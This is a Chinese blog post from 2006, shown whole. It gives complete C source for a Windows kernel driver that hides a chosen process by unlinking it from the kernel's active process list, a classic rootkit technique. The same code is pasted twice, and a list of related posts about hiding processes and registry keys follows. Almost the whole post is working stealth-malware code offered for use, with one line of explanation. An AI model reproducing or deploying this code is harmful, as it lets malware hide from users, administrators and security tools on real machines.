一段进程隐藏的代码
2006-03-07 02:05
549 查看
打开物理内存->找到活动进程链表->摘除自己
这个用去动作很简单:
#define DEBUGMSG
#include <ntddk.h>
#define DWORD ULONG
#define NT_DEVICE_NAME L"//Device//king"
#define DOS_DEVICE_NAME L"//DosDevices//king"
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
DWORD FindProcessEPROC(int Terminate_PID);
int PIDOFFSET=0x84;
int FLINKOFFSET=0x88;
PDEVICE_OBJECT KingObject=NULL;
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
PUNICODE_STRING pString;
UNICODE_STRING ntDeviceName;
UNICODE_STRING win32DeviceName;
NTSTATUS status;
RtlInitUnicodeString(&ntDeviceName,NT_DEVICE_NAME);
DbgPrint("Start/n");
if (!NT_SUCCESS(status = IoCreateDevice(DriverObject,0,&ntDeviceName,
FILE_DEVICE_UNKNOWN,0,FALSE,
&KingObject)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateDevice:%x/n",status);
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
if (!NT_SUCCESS(status = IoCreateSymbolicLink(&win32DeviceName,&ntDeviceName)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateSymbolicLink:%x/n",status);
DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverObject->MajorFunction[IRP_MJ_CLOSE]=DriverDispAtch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=myDriverIoControl;
DriverObject->DriverUnload=DriverUnloAd;
return STATUS_SUCCESS;
}
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus=STATUS_SUCCESS;
PIO_STACK_LOCATION stack;
DWORD *in_buffer, *out_buffer;
ULONG code,out_size;
DWORD eproc=0;
PLIST_ENTRY plist_active_procs;
stack = IoGetCurrentIrpStackLocation(Irp);
out_size = stack->Parameters.DeviceIoControl.OutputBufferLength;
code = stack->Parameters.DeviceIoControl.IoControlCode;
in_buffer = out_buffer = Irp->AssociatedIrp.SystemBuffer;
if(code==800)
{
DWORD PID=*in_buffer;
eproc=FindProcessEPROC(PID);
if(eproc==0)
{
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
plist_active_procs=(LIST_ENTRY *)(eproc+FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink;
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
*out_buffer = 0;
Irp->IoStatus.Information = 4;
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
return ntStatus;
}
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID DriverUnloAd (IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING win32DeviceName;
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
IoDeleteSymbolicLink(&win32DeviceName);
IoDeleteDevice(KingObject);
return;
}
DWORD FindProcessEPROC(int terminate_PID)
{
DWORD eproc =0;
int current_PID=0;
int start_PID=0;
int i_count=0;
PLIST_ENTRY plist_active_procs;
if(terminate_PID==0) return terminate_PID;
eproc=(DWORD)PsGetCurrentProcess();
start_PID=*((DWORD*)(eproc+PIDOFFSET));
current_PID=start_PID;
while(1)
{
if(terminate_PID==current_PID) return eproc;
else if((i_count>=1)&&(start_PID==current_PID))
{
return 0;
}
else
{
plist_active_procs=(LIST_ENTRY*)(eproc+FLINKOFFSET);
eproc=(DWORD)plist_active_procs->Flink;
eproc=eproc-FLINKOFFSET;
current_PID=*((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
这个用去动作很简单:
#define DEBUGMSG
#include <ntddk.h>
#define DWORD ULONG
#define NT_DEVICE_NAME L"//Device//king"
#define DOS_DEVICE_NAME L"//DosDevices//king"
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
DWORD FindProcessEPROC(int Terminate_PID);
int PIDOFFSET=0x84;
int FLINKOFFSET=0x88;
PDEVICE_OBJECT KingObject=NULL;
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
PUNICODE_STRING pString;
UNICODE_STRING ntDeviceName;
UNICODE_STRING win32DeviceName;
NTSTATUS status;
RtlInitUnicodeString(&ntDeviceName,NT_DEVICE_NAME);
DbgPrint("Start/n");
if (!NT_SUCCESS(status = IoCreateDevice(DriverObject,0,&ntDeviceName,
FILE_DEVICE_UNKNOWN,0,FALSE,
&KingObject)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateDevice:%x/n",status);
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
if (!NT_SUCCESS(status = IoCreateSymbolicLink(&win32DeviceName,&ntDeviceName)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateSymbolicLink:%x/n",status);
DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverObject->MajorFunction[IRP_MJ_CLOSE]=DriverDispAtch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=myDriverIoControl;
DriverObject->DriverUnload=DriverUnloAd;
return STATUS_SUCCESS;
}
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus=STATUS_SUCCESS;
PIO_STACK_LOCATION stack;
DWORD *in_buffer, *out_buffer;
ULONG code,out_size;
DWORD eproc=0;
PLIST_ENTRY plist_active_procs;
stack = IoGetCurrentIrpStackLocation(Irp);
out_size = stack->Parameters.DeviceIoControl.OutputBufferLength;
code = stack->Parameters.DeviceIoControl.IoControlCode;
in_buffer = out_buffer = Irp->AssociatedIrp.SystemBuffer;
if(code==800)
{
DWORD PID=*in_buffer;
eproc=FindProcessEPROC(PID);
if(eproc==0)
{
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
plist_active_procs=(LIST_ENTRY *)(eproc+FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink;
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
*out_buffer = 0;
Irp->IoStatus.Information = 4;
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
return ntStatus;
}
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID DriverUnloAd (IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING win32DeviceName;
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
IoDeleteSymbolicLink(&win32DeviceName);
IoDeleteDevice(KingObject);
return;
}
DWORD FindProcessEPROC(int terminate_PID)
{
DWORD eproc =0;
int current_PID=0;
int start_PID=0;
int i_count=0;
PLIST_ENTRY plist_active_procs;
if(terminate_PID==0) return terminate_PID;
eproc=(DWORD)PsGetCurrentProcess();
start_PID=*((DWORD*)(eproc+PIDOFFSET));
current_PID=start_PID;
while(1)
{
if(terminate_PID==current_PID) return eproc;
else if((i_count>=1)&&(start_PID==current_PID))
{
return 0;
}
else
{
plist_active_procs=(LIST_ENTRY*)(eproc+FLINKOFFSET);
eproc=(DWORD)plist_active_procs->Flink;
eproc=eproc-FLINKOFFSET;
current_PID=*((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
相关文章推荐
- 一段挂起进程中所有线程的代码
- 写一段PHP代码,确保多个进程同时写入同一个文件成功(腾讯)
- 一段检测当前进程是否已经在运行了的代码,非常实用!
- 请写一段 PHP 代码 ,确保多个进程同时写入同一个文件成功
- 发一段隐藏注册表项的驱动代码,可以过目前最新的IceSword1.22
- 一段隐藏注册表项的代码
- 纯Delphi实现,Hook API实现进程隐藏代码!
- 一段隐藏注册表项的代码
- Win2000下系统进程隐藏代码
- 2003年的代码-隐藏任意文件/目录-禁止访问任意文件/目录-隐藏任意注册表子键-禁止访问任意注册表子键-隐藏任意进程[NT系列]-自启动任意进程[95系列]-自定义可信赖进程(可以访问被保护的文件/目录,和/或者子键),并采用CRC32校验
- 修改活动进程链来隐藏进程代码
- 使用恶意软件将隐藏代码注入已知进程的攻击研究
- 发一段隐藏注册表项的驱动代码,可以过目前最新的IceSword1.22
- 在Delphi中隐藏程序进程的方法[2]--纯DELPHI代码方式
- 隐藏文件和进程的驱动代码
- 一段左侧菜单的显示隐藏的代码(兼容IE,FireFox)
- 用c++编写一段完整代码,要求判断一个进程(例如qq.exe)是否存在,若存在,输出存在,不存在就输出不存在。
- PHP写一段代码,确保多个进程同时写入一个文件成功
- 隐藏文件和进程的驱动代码
- 隐藏文件和进程的驱动代码收藏